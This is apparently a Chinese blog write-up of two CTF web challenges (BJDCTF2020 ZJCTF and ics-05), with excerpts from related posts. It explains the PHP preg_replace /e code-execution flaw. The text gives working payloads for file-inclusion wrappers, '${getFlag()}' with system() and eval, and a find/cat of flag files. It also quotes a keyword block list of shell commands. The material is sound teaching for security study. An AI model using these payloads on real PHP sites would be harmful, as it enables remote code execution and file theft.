BUUCTF:[BJDCTF2020]ZJCTF,不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞

最新推荐文章于 2024-08-17 00:44:04 发布
原创 最新推荐文章于 2024-08-17 00:44:04 发布 · 456 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #正则表达式

本文介绍了BJDCTF2020和攻防世界web之ics-05中的preg_replace漏洞利用,重点讨论了/e修正符导致的RCE问题。讲解了如何通过正则表达式和可变变量实现代码执行,强调了了解此漏洞及正则反向引用、PHP可变变量的重要性和应用。

目录

加一个题: 攻防世界web之ics-05
也是这个preg_replace

一、不足:

  1. 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去???
    这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php
  2. 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。
  3. 知识点:/e模式的preg_replace,有一个远程代码执行漏洞

二、知识点:

  1. 点这个:深入研究preg_replace与代码执行。讲真,里面的一些python的小脚本可以学习学习呦
  2. 看这个我自己吸收了一波之后的:正则中\1的用法—反向引用
  3. 那个可变变量的花括号,就像是C语言中的小括号一样,明确变量名字的,没有什么实际意义的
  4. 真就直接就执行了呗,(这里去掉花括号不行!!!不行!!!!)这个是给 第一点 实验用的。那个第一点中的 爬坑三 有详细解释。讲的很棒的,既然这个 ${phpinfo()} 能传,
  5. 这个 ** \S=${getFlag()} ** 的意思就是执行代码的意思了,我看了,大牛写的博客中也没有说为什么使执行代码,只是讲了怎么构造使之执行代码,。一样的 换成phpinfo()一样执行
    在这里插入图片描述

三、做完题,看完博客后的 要求:

  1. 这个套路要会用,看到这个 preg_replace 和 /e 的组合运用的时候,要能够想到使这个代码执行来
    然后

  2. 正则的反向代理\1得会,

  3. 还有PHP得 可变变量 也要弄得明明白白的!

四、我的思路:没有做出来,,,

php://input 一下子想到了,但是这个文件包含的还是慢了点,这个php://input换成data伪协议也可以做的

这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

最低0.47元/天 解锁文章
BUUCTF---web---[BJDCTF2020]ZJCTF不过如此
2201_75556700的博客
05-25 893
的函数,用于对字符串进行正则替换操作。具体来说,它会将匹配到的字符串转换为小写。传入一个参数text,里面的内容要包括I have a dream。在文件包含那一行,我们看到了next.php的提示,我们尝试读取文件。定义了一个getFlag函数,将参数cmd中的参数输出。/ei:当作php代码来执行,忽略大小写。5、由此我们可以构造新payload。根据代码:我们构造payload。1、点开连接,页面出现了提示。),然后将其赋值给一个变量。
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2671
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
[BUUCTF][BJDCTF2020]ZJCTF不过如此1(做题记录
qq_48597181的博客
04-05 2296
作为正则表达式匹配条件的参数名且这个参数值为的"getFlag();参数名:cmd和需要php执行的代码所以构造id=1&\S*={${getFlag()}}&cmd=system('linux命令');PS:\S是什么意思?正则表达式\S匹配非空字符PS: 为什么用{${getFlag()}} 这个写法?会调用phpinfo()函数并试图将结果嵌入到字符串中。而如果使用phpinfo()函数,它不会自动嵌入到字符串中。(我在这试了好久TAT。
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace
qq_43622442的博客
05-09 2293
[BJDCTF2020]ZJCTF不过如此(php双引号、伪协议、preg_replace) 1.打开网站,审计,第一个if可以用php://input 或者 data://伪协议绕过,php伪协议分析可看php伪协议: 2.然后往下,提示next.php文件,这里可以用php://filter伪协议拿到它的源码: 3.payload: http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&f
[BJDCTF2020]ZJCTF不过如此preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 756
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
[BJDCTF2020]ZJCTF不过如此 preg_replace /e模式漏洞
m0_64180167的博客
09-11 515
直接看看代码首先 text file获取参数判断 text为空 和 读取 text的文件内容 并且要为 I have a dream这里可以使用data伪协议绕过 让 text识别到 I have a dream本地测试一下就知道了通过 data获取 I have a dream 得到该数据 这样 就可以绕过判断然后文件包含 提示我们 next.phpinclude很显然就是使用伪协议 我们直接php://来读取解密我们看看其中关键的内容。
[BJDCTF 2020]ZJCTF不过如此解题思路(preg_replace \e 模式中的漏洞
2301_80307383的博客
08-17 1578
2.在php中,双引号里面如果包含有变量,php解释器会将其替换为变量解释后的结果;3.初始payload:.*={${phpinfo()}} ,即 GET 方式传入的参数名为 .* ,值为 {${phpinfo()}}\S*=${getFlag()}&cmd=eval($_POST[1]);所以要换为\S*=${phpinfo()}
buuctf-[BJDCTF2020]ZJCTF不过如此(小宇特详解)
小宇的web博客
02-12 1743
buuctf-[BJDCTF2020]ZJCTF不过如此(小宇特详解) 打开题目: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')
web buuctf [BJDCTF2020]ZJCTF不过如此
weixin_44214568的博客
03-23 2082
考点:正则匹配; 正则-反向引用; preg_replace /e模式漏洞 1. 一路做buuctf下来, web buuctf [ZJCTF 2019]NiZhuanSiWei1_半杯雨水敬过客的博客-优快云博客 和这题的思路一样,不做赘述,主要是利用php伪协议 1.令text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=(I have a dream的base64加密) file=php://filter/read=convert..
[ctf web][BJDCTF2020]ZJCTF不过如此 writeup | preg_replace 函数/e模式命令执行
ShenZ的博客
08-16 419
[BJDCTF2020]ZJCTF不过如此 [BJDCTF2020]ZJCTF不过如此 wp preg_replace 函数/e模式命令执行 参考文章:https://www.cesafe.com/html/6999.html
CTFshow web入门——文件包含
小元砸的博客
02-07 4443
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
BUUCTF逆向题练习记录(wp) --(3)WUSTCTF2020&&level1-4已完成
Air_cat的博客
08-28 605
注:funnyre待我搞懂angr后来解 WUSTCTF2020-level1 解密嗷 hexData = [0, 198 , 232 , 816 , 200 , 1536 , 300 , 6144 , 984 , 51200 , 570 , 92160 , 1200
CTFHub-web(RCE)
qq_49502930的博客
12-08 1280
文章目录eval执行文件包含php://input eval执行 打开关卡 意思是判断cmd是否被设置,若cmd被赋值,则执行如下语句,否则就继续显示以上代码。 我们先在url后输入 ?cmd=system("ls"); 查看根目录 然后输入 ?cmd=system("ls /"); 返回上一级 flag很显眼然后输入 ?cmd=system("cat /文件名"); 得到flag 文件包含 我们打开关卡 有个shell按钮,我们点击 这里使用火狐Hacker插件发现里面有个ctfhub变量,我
BUUCTF:[CISCN2019 华东南赛区]Web4 ---- jwt的加密,解密 复习 ---- 一个奇怪的 jwt 的secret方法
Zero_Adam的博客
04-19 1110
目录:一、自己做:1.没有思路啦,,2.没有思路啦,,二、学到的&&不足:三、学习WP 一、自己做: **注:**没有思路的地方,就是我看WP的地方。 解解jwt瞅瞅, 有加密的东西,我目前遇到过的jwt解法:弱密钥碰撞,碰撞出密钥来,就可以修改数据了,二:无密钥检测,用python重写一个无验证的jwt,有可能也成功, 再是一个进阶的方法:如果是SA256不对称加密的化,我们没办法破解,但是可以用SH256加密的方法巴拉巴拉给弄出来,没遇到过题,然后懒,,没有细细研究, 我*???,我正
ctfshow web入门 151-170文件上传wp
Firebasky的博客
11-12 1118
hhh 还是懒 链接:https://pan.baidu.com/s/1jAxmXznCWTm0UdXPc8VvCg 提取码:m9bw 复制这段内容后打开百度网盘手机App,操作更方便哦
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 2231
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
[BUUCTF][VNCTF2022公开赛]web wp
cosmoslin的博客
02-14 2766
GameV4.0 base64解码即可 newcalc0 镜像为node:lts-alpine,package.json全部为最新包 const express = require("express"); const path = require("path"); const vm2 = require("vm2"); const app = express(); app.use(express.urlencoded({ extended: true })); app.use(express.json(
CTF中WEB题——RCE
tomyyyyy
10-31 7108
CTF中WEB题——RCE 目录CTF中WEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
攻防世界 ics-05
最新发布
01-05
### 关于ICS-05的网络安全攻防挑战 #### 解题思路概述 在处理ICS-05这类Web安全挑战时,重点在于识别并利用特定PHP函数的安全漏洞来获取敏感信息。具体来说,在此案例中,`preg_replace()` 函数存在潜在风险,当其第三个参数设置为 `/e` 修饰符时,允许将正则表达式的匹配结果作为 PHP 代码执行[^3]。 #### 利用 `preg_replace` 进行攻击向量构建 为了成功完成这一挑战,参与者需构造恶意输入以触发远程命令执行 (RCE),从而能够遍历服务器文件系统寻找标志文件 (`flag`) 或其他有价值的信息。通过精心设计 URL 参数: ```plaintext ?pat=/(.*)/e&rep=system('find+/+-name+*flag*')&sub=good ``` 上述请求会尝试定位任何名称中含有 "flag" 的文件,并返回路径给攻击者。进一步地,一旦找到了目标文件的位置,则可以通过类似的技巧读取该文件内容: ```plaintext ?pat=/(.*)/e&rep=system('cat+/var/www/html/s3chahahaDir/flag/flag.php')&sub=good ``` 这一步骤展示了如何利用已知漏洞实现对受保护资源的未授权访问[^4]。 #### 安全防护措施建议 针对此类基于PHP的应用程序中存在的安全隐患,开发人员应当遵循最佳实践指南,比如禁用危险功能(如 `/e` 修改器),并对用户提交的数据实施严格的验证机制。此外,定期审查源码质量以及部署自动化测试工具也是预防类似事件发生的有效手段之一。 ```php // 不推荐的做法:启用 /e 选项可能导致任意代码执行 $unsafe_pattern = "/(.*)/e"; $safe_replacement = 'strrev("$1")'; // 使用更安全的方式代替 system() 调用 $result = preg_replace($unsafe_pattern, $safe_replacement, $input); // 推荐做法:完全移除 /e 支持 $pattern = '/\bhello\b/i'; $replacement = 'world'; echo preg_replace($pattern, $replacement, 'say hello to the world'); ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值